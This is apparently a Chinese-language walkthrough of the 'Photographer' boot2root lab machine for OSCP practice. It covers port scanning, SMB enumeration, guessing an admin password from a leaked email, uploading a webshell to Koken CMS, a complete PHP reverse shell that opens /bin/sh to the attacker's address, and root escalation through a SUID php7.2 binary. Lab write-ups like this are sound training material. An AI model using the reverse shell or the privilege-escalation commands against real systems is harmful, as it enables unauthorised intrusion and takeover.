靶机下载地址:戳我

This machine was developed to prepare for OSCP. It is boot2root, tested on VirtualBox (but works on VMWare) and has two flags: user.txt and proof.txt.

0x00 信息收集

查看靶机信息可得其ip地址为192.168.237.132。

对端口进行扫描:

PORT     STATE SERVICE     VERSION
80/tcp   open  http        Apache httpd 2.4.18 ((Ubuntu))
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
8000/tcp open  http        Apache httpd 2.4.18
MAC Address: 00:0C:29:C1:54:75 (VMware)
Service Info: Hosts: PHOTOGRAPHER, example.com

8000端口和80被wappalyzer识别出使用的CMS为Koken,后台存在文件上传漏洞,但是现在还登陆不进去。

有一个可疑的shell.php:

存在后台登陆界面:

使用enum4linux枚举信息。发现存在共享:

[+] Attempting to map shares on 192.168.237.132
//192.168.237.132/print$        Mapping: DENIED, Listing: N/A
//192.168.237.132/sambashare    Mapping: OK, Listing: OK
//192.168.237.132/IPC$  [E] Can't understand response:
NT_STATUS_OBJECT_NAME_NOT_FOUND listing \*

存在两个用户名,分别是daisa和agi。

[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
S-1-22-1-1000 Unix User\daisa (Local User)
S-1-22-1-1001 Unix User\agi (Local User)

0x01 获取权限

尝试匿名访问共享,成功得到文件mailsent.txt和wordpress备份文件。

mailsent.txt:

Message-ID: <4129F3CA.2020509@dc.edu>
Date: Mon, 20 Jul 2020 11:40:36 -0400
From: Agi Clarence <agi@photographer.com>
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.0.1) Gecko/20020823 Netscape/7.0
X-Accept-Language: en-us, en
MIME-Version: 1.0
To: Daisa Ahomi <daisa@photographer.com>
Subject: To Do - Daisa Website's
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit

Hi Daisa!
Your site is ready now.
Don't forget your secret, my babygirl ;)

通过邮件得到邮箱daisa@photographer.com,关键词Daisa、secret、babygirl等,经过尝试,使用该邮箱和密码babygirl可成功登陆8000端口的后台管理。

Import content→上传🐎→抓包拦截→修改后缀名

复制前台的【Download File】的连接,发现🐎已经成功上传。

成功获得user.txt中的内容^^

0x02 提升权限

bp不太好操作,反弹shell挪进来。(问就是手贱把题目内置的shell删掉了

<?php 
$ip = '192.168.237.131';
$port = '9982';
$sock = fsockopen($ip, $port);
$descriptorspec = array(
        0 => $sock,
        1 => $sock,
        2 => $sock
);
$process = proc_open('/bin/sh', $descriptorspec, $pipes);
proc_close($process);
?>

找到正在系统上运行的所有SUID可执行文件:

find / -user root -perm -4000 -print 2>/dev/null

发现php7.2,查资料得知:

我们需要它以root权限执行,所以:

/usr/bin/php7.2 -r "pcntl_exec('/bin/sh', ['-p']);"

在/root文件夹下得到proof.txt: